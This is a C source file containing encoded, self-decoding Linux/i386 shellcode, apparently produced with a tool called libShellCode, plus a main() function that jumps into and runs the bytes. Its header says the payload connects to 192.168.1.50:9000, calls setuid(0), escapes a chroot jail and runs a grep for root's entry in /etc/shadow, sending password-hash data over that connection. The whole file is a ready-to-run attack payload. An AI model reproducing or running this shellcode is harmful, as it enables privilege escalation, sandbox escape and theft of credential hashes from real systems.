/*
 *     __   ___   _
 *    /  \ |   \ | | /\--------<ShellCode generated with libShellCode>--------->
 *   / /\ \| |\ \| |/ /      
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 * 
 * 
 * This is a Linux/i386 polymorphic ShellCode that opens a connection to 
 * 192.168.1.50:9000 and exec a setuid(0), then evade from chroot and executes 
 * /bin/grep root /etc/shadow and exit(0).
 *
 */

char shellcode[]=
"\xeb\x14\x5e\x31\xc9\xb0\x11\x89\xf3\xb1\xac\x01\xce\xb1\xc6\x30"
"\x03\x43\xe2\xfb\xeb\x05\xe8\xe7\xff\xff\xff\x20\xca\xe6\xf2\xa1"
"\x77\x42\x52\x42\x52\x42\x98\xf0\x5a\xdc\x91\x98\xd6\x20\xd8\x77"
"\xa8\x32\x39\x79\xd1\xb9\x10\x23\x77\x40\x52\x77\x42\x98\xf0\xa1"
"\x01\x41\x40\x46\x98\xf0\x52\xa1\x77\xdc\x91\x98\xea\x98\xc8\xa1"
"\x2e\x58\xdc\x91\x50\xf3\xe9\x20\xd1\x20\xca\xa1\x06\xdc\x91\x20"
"\xd1\x42\x79\x7b\x70\x78\x7d\x98\xf2\xa1\x36\xdc\x91\x20\xd1\xa1"
"\x2c\xdc\x91\x20\xd1\x20\xca\x20\xd8\xa0\x1b\x41\x79\x3f\x3f\x3e"
"\x3e\xf3\xe8\x98\xf2\xa1\x1d\xdc\x91\x20\xd1\x20\xca\x7b\x3f\x98"
"\xf2\xa1\x2c\xdc\x91\x20\xd1\x99\x57\x0b\x98\x67\x0a\x98\xe2\x99"
"\x57\x18\x91\xd2\x1b\x98\x4f\x0e\x99\x57\x1f\x91\xd2\x14\x98\x4f"
"\x32\x98\x57\x36\xa1\x1a\x98\xe2\x9c\x5f\x0a\x9c\x47\x36\xdc\x91"
"\x20\xd1\x20\xca\x51\xdc\x91\x3e\x73\x78\x7f\x3e\x76\x63\x74\x61"
"\x31\x63\x7e\x7e\x65\x31\x3e\x74\x65\x72\x3e\x62\x79\x70\x75\x7e"
"\x66";

main()
{
  void (*f)();
  (char *)f = shellcode;
  f();
}